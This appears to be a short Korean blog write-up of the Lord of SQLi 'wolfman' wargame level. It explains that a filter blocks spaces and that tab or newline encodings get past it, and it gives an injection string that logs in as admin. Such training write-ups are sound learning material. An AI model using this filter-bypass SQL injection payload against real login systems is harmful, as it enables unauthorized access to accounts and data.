본문 바로가기
Wargame, CTF/LOS_eagle

LOS _wolfman

부산형 2019. 10. 1. 11:05

preg_match 함수는 / 와 / 사이의 문자를 필터링하는 함수

위의 preg_match는 데이터베이스 변조를 막기위한 것으로 보이고

이번 문제에서 볼 2번째 preg_match에서 공백(space, %20)을 필터링으로 막아놓았다

 

Hint

SQL 공백 우회

 

...더보기

%0a->개행문자

%09->Tab

등 사용

qurey

pw='or%09id='admin'%09and%091=1%23

 

 

 

'Wargame, CTF > LOS_eagle' 카테고리의 다른 글

LOS _orge  (0) 2019.10.05
LOS _dark elf  (0) 2019.10.05
LOS _orc  (0) 2019.10.01
LOS _goblin  (0) 2019.10.01
LOS _cobolt  (0) 2019.10.01

'Wargame, CTF/LOS_eagle' Related Articles

티스토리툴바